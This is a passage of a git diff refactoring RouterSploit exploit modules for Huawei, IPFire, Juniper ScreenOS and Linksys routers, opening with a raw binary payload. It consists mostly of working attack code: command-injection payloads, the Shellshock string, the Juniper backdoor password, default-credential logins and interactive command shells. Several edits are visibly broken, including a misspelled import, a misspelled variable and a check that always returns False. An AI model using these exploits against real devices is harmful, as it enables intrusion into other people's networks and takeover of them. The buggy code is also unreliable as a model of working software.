"\x01\x00\x00\x00\x68\xf8\x16\x00\xdc\xf8\x12\x00\x44\x4a\x0f\x77\xf4\xf8\x12\x00\x3b\xa0\x00\x66\x9c\x70\x40\x00\x01\x00\x00\x00" - "\xec\xf8\x12\x00\xf0\xf8\x12\x00\xe8\xf8\x12\x00\x84\xfb\x12\x00\x54\xfc\x12\x00\x84\xfb\x12\x00\x00\x1b\x00\x10\x00\x00\x00\x00" - "\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00") + def __init__(self): + self.payload = ( + b"\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00" + b"\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00" + b"\x32\x00\x00\x00\x34\x60\x5d\x77\x00\x00\x00\x00\x84\xfb\x12\x00\x01\x00\x00\x00\xb8\x88\x24\x00\xf8\x8f\x19\x00\x0d\x00\x00\x00" + b"\x18\x94\x19\x00\xf8\x98\x19\x00\x74\xf4\x12\x00\x84\xf6\x12\x00\x4c\xf7\x12\x00\x00\xe9\x91\x7c\x10\x6f\x94\x7c\x00\x00\xff\xff" + b"\xae\x2c\x92\x7c\xe4\x2c\x92\x7c\x51\x2d\x92\x7c\x58\x2d\x92\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xf7\x12\x00" + b"\x44\xf5\x12\x00\xb0\x65\x92\x7c\xf8\xf7\x12\x00\x00\xe9\x91\x7c\x60\x2d\x92\x7c\xff\xff\xff\xff\x58\x2d\x92\x7c\x12\x66\x92\x7c" + b"\x01\x00\x00\x00\x76\x02\x48\x0d\xee\x64\x92\x7c\x00\x00\x00\x00\x9c\x70\x40\x00\x00\x00\x00\x00\x34\x60\x5d\x77\x30\x28\x1f\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x70\x2f\x15\x00\x78\x01\x15\x00\x00\x00\x00\x00\x78\x2f\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x54\xf8\x12\x00\xa8\x87\xec\x01\x50\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x02\x48\x0d\x00\x00\x08\x02" + b"\xe4\xf5\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xf6\x12\x00\x0d\x00\x00\x00\xa2\x6f\x94\x7c\xf8\x98\x19\x00\x78\x76\x4b\x02\xd8\x93\x19\x00" + b"\x60\x90\x19\x00\x0d\x00\x00\x00\xf8\x8f\x19\x00\x84\xfb\x12\x00\x28\xf6\x12\x00\x30\xd4\x4c\x77\x48\xf7\x12\x00\x00\xe9\x91\x7c" + b"\x94\xf6\x12\x00\x94\xf6\x12\x00\xd8\x93\x19\x00\xec\x73\x94\x7c\x70\xe3\x4b\x02\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x0f\x00\x41\x00\x13\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\xf8\x98\x19\x00\xb4\xf9\x12\x00\xf8\x8f\x19\x00" + b"\x58\xf7\x12\x00\x3d\x00\x92\x7c\xf6\x89\xec\x01\x00\x00\x00\x00\xe8\x06\x02\x00\x54\xfc\x12\x00\x01\x00\x00\x00\x01\x00\x00\x00" + b"\x00\x00\x00\x00\x12\xe1\xf8\x09\x7d\x0b\x00\x00\x72\xab\x56\x48\x3f\xe1\xbe\x07\x15\x04\x92\x7c\x1e\x04\x92\x7c\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\xe0\xfd\x7f\xeb\x50\xd7\xc6\x1a\x00\x00\x00\x00\xe0\xfd\x7f\x00\x10\x91\x7c\x00\x00\x00\x00\x00\x00\x01\x00" + b"\x00\xe0\xfd\x7f\x5c\xf7\x12\x00\xe6\x45\x92\x7c\x40\x04\x92\x7c\x00\xd6\x98\x7c\x48\xf7\x12\x00\x40\x12\x19\x00\x8a\x74\x94\x7c" + b"\x2c\xf7\x12\x00\xa8\x87\xec\x01\x00\x00\x00\x00\x00\x00\x15\x00\x0e\x00\xeb\x03\x80\x0a\x5f\x00\x64\x46\x00\x10\xfe\xf7\x12\x00" + b"\xb0\x44\x00\x10\x04\x00\x00\x00\x8c\xf7\x12\x00\xd3\x7e\x92\x7c\xfe\xf7\x12\x00\x31\x00\x00\x00\x00\x00\x00\x10\xa0\x45\x00\x10" + b"\x64\x46\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x10\xe0\x00\x00\x10" + b"\x64\xf7\x12\x00\x01\x00\x00\x00\x9c\xf7\x12\x00\x65\x03\x92\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x58\xf8\x12\x00\x9a\x7d\x92\x7c" + b"\x00\x00\x00\x10\xfe\xf7\x12\x00\xf8\xf7\x12\x00\xf8\xf7\x12\x00\xfe\xf7\x12\x00\x3f\x7e\x92\x7c\x78\xb1\x98\x7c\xe9\x7d\x92\x7c" + b"\x8c\x70\x40\x00\x9c\x70\x40\x00\xff\xff\x00\x00\x00\xd0\xfd\x7f\xe0\x47\x25\x00\x08\xe4\x80\x7c\xb0\x44\x00\x10\x6c\xe4\x80\x7c" + b"\xf0\x47\x25\x00\xa8\xf8\x12\x00\x00\x00\x00\x10\x00\x00\x00\x00\xfc\xf7\x12\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\xfe\x04\x00\x00" + b"\xd0\x41\x25\x00\x00\x1b\x00\x10\x00\x00\x67\x65\x74\x41\x64\x73\x6c\x53\x74\x61\x74\x75\x73\x00\x3d\x00\x92\x7c\xea\x1b\x80\x7c" + b"\x00\x00\x15\x00\x00\x00\x00\x00\xfa\x1b\x80\x7c\x64\x5d\x47\x00\x9c\x70\x40\x00\x9f\xac\x80\x7c\x4e\x02\x50\x02\xa8\x87\xec\x01" + b"\x16\x00\x18\x00\x00\xdc\xfd\x7f\xef\xfa\x00\x00\xb4\xf7\x12\x00\xa8\x87\xec\x01\xa8\xf9\x12\x00\x00\xe9\x91\x7c\xf0\x7d\x92\x7c" + b"\xff\xff\xff\xff\xe9\x7d\x92\x7c\xa0\x7e\x92\x7c\x00\x00\x00\x10\x94\xf8\x12\x00\x00\x00\x00\x00\xa8\xf8\x12\x00\x01\x00\x00\x00" + b"\x9c\xf8\x12\x00\x6e\xae\x80\x7c\x9c\xf8\x12\x00\x80\xae\x80\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x64\x5d\x47\x00\x9f\xac\x80\x7c" + b"\x0d\x00\x0e\x00\x8c\x70\x40\x00\xc4\xf8\x12\x00\xd8\xa0\x00\x66\x00\x00\x00\x10\x00\x1b\x00\x10\x84\xfb\x12\x00\x54\xfc\x12\x00" + b"\x01\x00\x00\x00\x68\xf8\x16\x00\xdc\xf8\x12\x00\x44\x4a\x0f\x77\xf4\xf8\x12\x00\x3b\xa0\x00\x66\x9c\x70\x40\x00\x01\x00\x00\x00" + b"\xec\xf8\x12\x00\xf0\xf8\x12\x00\xe8\xf8\x12\x00\x84\xfb\x12\x00\x54\xfc\x12\x00\x84\xfb\x12\x00\x00\x1b\x00\x10\x00\x00\x00\x00" + b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00" + ) def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -79,7 +72,7 @@ def run(self): try: print_status("Waiting for response") response = sock.recv(1024) - except Exception: + except: print_error("Exploit failed - device seems to be not vulnerable") return @@ -95,7 +88,7 @@ def check(self): try: response = sock.recv(1024) - except Exception: + except: return False # target is not vulnerable if len(response): diff --git a/routersploit/modules/exploits/routers/huawei/hg530_hg520b_password_disclosure.py b/routersploit/modules/exploits/routers/huawei/hg530_hg520b_password_disclosure.py index a0d4ce5d8..dbafa2ee8 100644 --- a/routersploit/modules/exploits/routers/huawei/hg530_hg520b_password_disclosure.py +++ b/routersploit/modules/exploits/routers/huawei/hg530_hg520b_password_disclosure.py @@ -1,46 +1,35 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_info, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Huawei HG530 and HG520b Password Disclosure vulnerability. - If the target is vulnerable it allows to read credentials." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Huawei HG530 & HG520b Password Disclosure', - 'description': 'Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices.' - 'If the target is vulnerable it allows to read credentials.', - 'authors': [ - 'Fady Mohamed Osman (@fady_osman)', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Huawei HG530 & HG520b Password Disclosure", + "description": "Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. " + "If the target is vulnerable it allows to read credentials.", + "authors": [ + "Fady Mohamed Osman (@fady_osman)", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/37424/', + "references": [ + "https://www.exploit-db.com/exploits/37424/", ], - 'devices': [ - 'Huawei Home Gateway HG530', - 'Huawei Home Gateway HG520b', + "devices": [ + "Huawei Home Gateway HG530", + "Huawei Home Gateway HG520b", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/UD/?5".format(self.target, self.port) - headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', - 'Content-Type': 'text/xml; charset="utf-8"', - 'Expect': '100-continue'} + headers = { + 'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', + 'Content-Type': 'text/xml; charset="utf-8"', + 'Expect': '100-continue' + } data = ("" "" "" @@ -49,7 +38,12 @@ def run(self): "" "") - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/UD/?5", + headers=headers, + data=data + ) if response is None: return @@ -64,7 +58,6 @@ def run(self): @mute def check(self): - url = "{}:{}/UD/?5".format(self.target, self.port) headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"', 'Content-Type': 'text/xml; charset="utf-8"', 'Expect': '100-continue'} @@ -76,7 +69,12 @@ def check(self): "" "") - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/UD/?5", + headers=headers, + data=data + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py b/routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py deleted file mode 100644 index c294657ec..000000000 --- a/routersploit/modules/exploits/routers/huawei/hg630a_default_creds.py +++ /dev/null @@ -1,64 +0,0 @@ -import socket -import paramiko - -from routersploit import ( - exploits, - print_error, - print_success, - mute, - ssh_interactive, - validators -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Huawei HG630a and HG630a-50 devices. If the target is vulnerable it is possible to authenticate through SSH service. - """ - __info__ = { - 'name': 'Huawei HG630a Default Credentials', - 'description': 'Module exploits default SSH credentials Huawei HG630a and HG630a-50 devices. ' - 'If the target is vulnerable it is possible to authenticate through SSH service.', - 'authors': [ - 'Murat Sahin (@murtshn)', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/38663/', - ], - 'devices': [ - 'Huawei HG630a', - 'Huawei HG630a-50', - ], - } - - target = exploits.Option('', 'Target IP address', validators=validators.address) # target address - ssh_port = exploits.Option(22, 'Target SSH Port', validators=validators.integer) # target port - - user = exploits.Option('admin', 'Default username to log in with') - password = exploits.Option('admin', 'Default password to log in with') - - def run(self): - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password) - except (paramiko.ssh_exception.SSHException, socket.error): - print_error("Exploit failed - cannot log in with credentials {} / {}".format(self.user, self.password)) - return - else: - print_success("SSH - Successful authentication") - ssh_interactive(ssh) - - @mute - def check(self): - ssh = paramiko.SSHClient() - ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - - try: - ssh.connect(self.target, self.ssh_port, timeout=5, username=self.user, password=self.password) - except (paramiko.ssh_exception.SSHException, socket.error): - return False # target is not vulnerable - else: - return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/huawei/hg866_password_change.py b/routersploit/modules/exploits/routers/huawei/hg866_password_change.py index 3a8d7b11b..c0b547bb7 100644 --- a/routersploit/modules/exploits/routers/huawei/hg866_password_change.py +++ b/routersploit/modules/exploits/routers/huawei/hg866_password_change.py @@ -1,49 +1,43 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Huawei HG866 Password Change vulnerability. - If the target is vulnerable it allows to change administration password. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Huawei HG866 Password Cahnge', - 'description': 'Module exploits password change vulnerability in Huawei HG866 devices.' - 'If the target is vulnerable it allows to change administration password.', - 'authors': [ - 'hkm', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Huawei HG866 Password Change", + "description": "Module exploits password change vulnerability in Huawei HG866 devices. " + "If the target is vulnerable it allows to change administration password.", + "authors": [ + "hkm", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/19185/', + "references": [ + "https://www.exploit-db.com/exploits/19185/", ], - 'devices': [ - 'Huawei HG866', + "devices": [ + "Huawei HG866", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - password = exploits.Option('routersploit', 'Password value to change admin account with') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + password = OptString('routersploit', 'Password value to change admin account with') def run(self): if self.check(): - url = "{}:{}/html/password.html".format(self.target, self.port) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} + headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = {'psw': self.password, 'reenterpsw': self.password, 'save': 'Apply'} print_status("Sending password change request") - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/html/password.html", + headers=headers, + data=data + ) if response.status_code == 200: print_success("Administrator's password has been changed to {}".format(self.password)) @@ -54,9 +48,10 @@ def run(self): @mute def check(self): - url = "{}:{}/html/password.html".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/html/password.html" + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py b/routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py new file mode 100644 index 000000000..5c7794cee --- /dev/null +++ b/routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py @@ -0,0 +1,87 @@ +import re +from routersploit.core.exploit import * +from routerpsloit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "IPFire Oinkcode RCE", + "description": "Module exploits IPFire < 2.19 Core Update 110 Remote Code Execution vulnerability " + "which allows executing command on operating system level.", + "authors": [ + "0x09AL", # vulnerability discovery + "Marcin Bury ", # routersploit module + ], + "references": [ + "https://www.exploit-db.com/exploits/42149/", + ], + "devices": [ + "IPFire < 2.19 Core Update 110", + ] + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(444, "Target HTTP port") + ssl = OptBool("true", "SSL enabled: true/false") + + username = OptString("admin", "Username to log in with") + password = OptString("admin", "Password to log in with") + + def run(self): + if self.check(): + print_success("Target is vulnerable") + print_status("Invoking command loop...") + shell(self, + architecture="cmd", + method="cmd", + payload=["awk", "perl", "php", "python"]) + else: + print_error("Target is not vulnerable") + + def execute(self, cmd): + headers = { + "Referer": "{}://{}:{}/cgi-bin/ids.cgi".format("https" if self.ssl else "http", self.target, self.port) + } + + payload = "`{}`".format(cmd) + + data = { + "ENABLE_SNORT_GREEN": "on", + "ENABLE_SNORT": "on", + "RULES": "registered", + "OINKCODE": payload, + "ACTION": "Download new ruleset", + "ACTION2": "snort" + } + + response = self.http_request( + method="POST", + path="/cgi-bin/ids.cgi", + headers=headers, + data=data, + auth=(self.username, self.password) + ) + + return "" + + @mute + def check(self): + response = self.http_request( + method="GET", + path="/cgi-bin/pakfire.cgi", + auth=(self.username, self.password), + ) + + if response is None: + return False # target is not vulnerable + + if response.status_code is 200: + res = re.findall(r"IPFire ([\d.]{4}) \([\w]+\) - Core Update ([\d]+)", response.text) + if res: + version = res[0][0] + update = int(res[0][1]) + + if Version(version) <= Version("2.19") and udpate <= 110: + return True # target is vulnerable + + return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py b/routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py index 4d794fab6..4b34ef684 100644 --- a/routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py +++ b/routersploit/modules/exploits/routers/ipfire/ipfire_proxy_rce.py @@ -1,74 +1,49 @@ -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - print_info, - random_text, - http_request, - mute, - validators, - shell, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on operating system level. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'IPFire Proxy RCE', - 'description': 'Module exploits IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability which allows executing command on operating system level.', - 'authors': [ - 'Yann CAM', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/39765/', - 'http://www.ipfire.org/news/ipfire-2-19-core-update-101-released', - ], - 'devices': [ - 'IPFire < 2.19 Core Update 101', - ] + "name": "IPFire Proxy RCE", + "description": "Module exploits IPFire < 2.19 Core Update 101 Remote Code Execution " + "vulnerability which allows executing command on operating system level.", + "authors": ( + "Yann CAM", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/39765/", + "http://www.ipfire.org/news/ipfire-2-19-core-update-101-released", + ), + "devices": ( + "IPFire < 2.19 Core Update 101", + ) } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(444, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(444, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in with') - password = exploits.Option('admin', 'Password to log in with') + username = OptString("admin", "Username to log in with") + password = OptString("admin", "Password to log in with") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - shell(self, - architecture="generic", - method="awk", - payloads=["awk_bind_tcp", "awk_reverse_tcp"]) + shell(self, architecture="none", method="awk") else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - @mute def execute(self, cmd): url = "{}:{}/cgi-bin/proxy.cgi".format(self.target, self.port) - headers = {u'Content-Type': u'application/x-www-form-urlencoded', - u'Referer': url} + headers = {'Content-Type': 'application/x-www-form-urlencoded', + 'Referer': url} payload = "||{};#".format(cmd) - data = {"NCSA_USERNAME": random_text(12), + data = {"NCSA_USERNAME": utils.random_text(12), "NCSA_GROUP": "standard", "NCSA_PASS": payload, "NCSA_PASS_CONFIRM": payload, @@ -76,7 +51,15 @@ def execute(self, cmd): "ACTION": "Add", "NCSA_MIN_PASS_LEN": "6"} - response = http_request(method="POST", url=url, headers=headers, data=data, auth=(self.username, self.password), timeout=10) + response = self.http_request( + method="POST", + path="/cgi-bin/proxy.cgi", + headers=headers, + data=data, + auth=(self.username, self.password), + timeout=10, + ) + if response is None: return "" @@ -89,7 +72,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py b/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py index e1412e2e5..a298ab691 100644 --- a/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py +++ b/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py @@ -1,66 +1,43 @@ -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_info, - random_text, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Shellshock vulnerability in IPFire <= 2.15 Core Update 82. - If the target is vulnerable it allows to execute command on operating system level. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'IPFire Shellshock', - 'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.' - 'If the target is vulnerable it is possible to execute commands on operating system level.', - 'authors': [ - 'Claudio Viviani', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "IPFire Shellshock", + "description": "Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. " + "If the target is vulnerable it is possible to execute commands on operating system level.", + "authors": [ + "Claudio Viviani", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/34839', + "references": [ + "https://www.exploit-db.com/exploits/34839", ], - 'devices': [ - 'IPFire <= 2.15 Core Update 82', + "devices": [ + "IPFire <= 2.15 Core Update 82", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(444, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(444, "Target HTTP port") - username = exploits.Option('admin', 'Username to log in with') - password = exploits.Option('admin', 'Password to log in with') + username = OptString("admin", "Username to log in with") + password = OptString("admin", "Password to log in with") - payload = "() { :;}; /bin/bash -c '{{cmd}}'" + def __init__(self): + self.payload = "() { :;}; /bin/bash -c '{{cmd}}'" def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port) - - marker = random_text(32) + marker = utils.random_text(32) cmd = "echo {};{};echo{}".format(marker, cmd, marker) payload = self.payload.replace("{{cmd}}", cmd) @@ -68,7 +45,12 @@ def execute(self, cmd): 'VULN': payload, } - response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path="/cgi-bin/index.cgi", + headers=headers, + auth=(self.username, self.password) + ) if response is None: return "" @@ -82,9 +64,7 @@ def execute(self, cmd): @mute def check(self): - url = "{}:{}/cgi-bin/index.cgi".format(self.target, self.port) - - marker = random_text(32) + marker = utils.random_text(32) cmd = "echo {}".format(marker) payload = self.payload.replace("{{cmd}}", cmd) @@ -92,7 +72,12 @@ def check(self): 'VULN': payload, } - response = http_request(method="GET", url=url, headers=headers, auth=(self.username, self.password)) + response = self.http_request( + method="GET", + path="/cgi-bin/index.cgi", + headers=headers, + auth=(self.username, self.password) + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py b/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py index ef412e042..d4632882e 100644 --- a/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py +++ b/routersploit/modules/exploits/routers/juniper/screenos_backdoor.py @@ -1,27 +1,14 @@ -import telnetlib -import paramiko +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient +from routersploit.core.telnet.telnet_client import TelnetClient -from routersploit import ( - exploits, - print_success, - print_error, - mute, - ssh_interactive, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Juniper ScreenOS Authentication Backdoor vulnerability. - If the target is vulnerable it is possible to authenticate to the device" - """ +class Exploit(TelnetClient): __info__ = { 'name': 'Juniper ScreenOS Backdoor', 'description': 'Module exploits Juniper ScreenOS Authentication Backdoor vulnerability. If the target is is possible to authentiate to the device.', 'authors': [ 'hdm', # vulnerability discovery - 'Marcin Bury ', # routersploit module + 'Marcin Bury ', # routersploit module ], 'references': [ 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor', @@ -32,12 +19,13 @@ class Exploit(exploits.Exploit): ] } - target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4) # target address - ssh_port = exploits.Option(22, 'Target SSH port', validators=validators.integer) # target ssh port - telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer) # target telnet port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(22, "Target SSH port") + telnet_port = OptPort(23, "Target Telnet port") - username = "admin" - password = "<<< %s(un='%s') = %u" + def __init__(self): + self.username = "admin" + self.password = "<<< %s(un='%s') = %u" def run(self): ssh = paramiko.SSHClient() @@ -45,7 +33,7 @@ def run(self): try: ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password) - except Exception: + except: ssh.close() else: print_success("SSH - Successful authentication") @@ -53,7 +41,7 @@ def run(self): return try: - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) + tn = telnetlib.Telnet(self.target, self.telnet_port) tn.write("\r\n") tn.expect(["Login: ", "login: "], 5) tn.write(self.username + "\r\n") @@ -72,24 +60,25 @@ def run(self): tn.interact() tn.close() - except Exception: + except: print_error("Connection Error") - return - + return @mute def check(self): + return False + ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.target, self.ssh_port, timeout=5, username=self.username, password=self.password) - except Exception: + except: ssh.close() else: return True try: - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) + tn = telnetlib.Telnet(self.target, self.telnet_port) tn.write("\r\n") tn.expect(["Login: ", "login: "], 5) tn.write(self.username + "\r\n") @@ -107,7 +96,7 @@ def check(self): tn.close() return True tn.close() - except Exception: + except: return False return False diff --git a/routersploit/modules/exploits/routers/linksys/1500_2500_rce.py b/routersploit/modules/exploits/routers/linksys/1500_2500_rce.py index 3bfaa6c8d..06ffc4741 100644 --- a/routersploit/modules/exploits/routers/linksys/1500_2500_rce.py +++ b/routersploit/modules/exploits/routers/linksys/1500_2500_rce.py @@ -1,63 +1,41 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - random_text, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit for Linksys E1500 and E2500 devices Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Linksys E1500/E2500', - 'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices.' - 'Diagnostics interface allows executing root privileged shell commands is ' - 'available on dedicated web pages on the device.', - 'authors': [ - 'Michael Messner', # vulnerability discovery - 'Esteban Rodriguez (n00py)', # routersploit module + "name": "Linksys E1500/E2500", + "description": "Module exploits remote command execution in Linksys E1500/E2500 devices. " + "Diagnostics interface allows executing root privileged shell commands is " + "available on dedicated web pages on the device.", + "authors": [ + "Michael Messner", # vulnerability discovery + "Esteban Rodriguez (n00py)", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/24475/', + "references": [ + "https://www.exploit-db.com/exploits/24475/", ], - 'devices': [ - 'Linksys E1500/E2500', + "devices": [ + "Linksys E1500/E2500", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - username = exploits.Option('admin', 'Username to login with') - password = exploits.Option('admin', 'Password to login with') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + username = OptString("admin", "Username to login with") + password = OptString("admin", "Password to login with") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") print_status("It is blind command injection - response is not available") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - url = "{}:{}/apply.cgi".format(self.target, self.port) data = { "submit_button": "Diagnostics", "change_action": "gozila_cgi", @@ -70,14 +48,19 @@ def execute(self, cmd): "traceroute_ip": "127.0.0.1" } - http_request(method="POST", url=url, data=data, auth=(self.username, self.password)) + self.http_request( + method="POST", + path="/apply.cgi", + data=data, + auth=(self.username, self.password) + ) + return "" @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) - url = "{}:{}/apply.cgi".format(self.target, 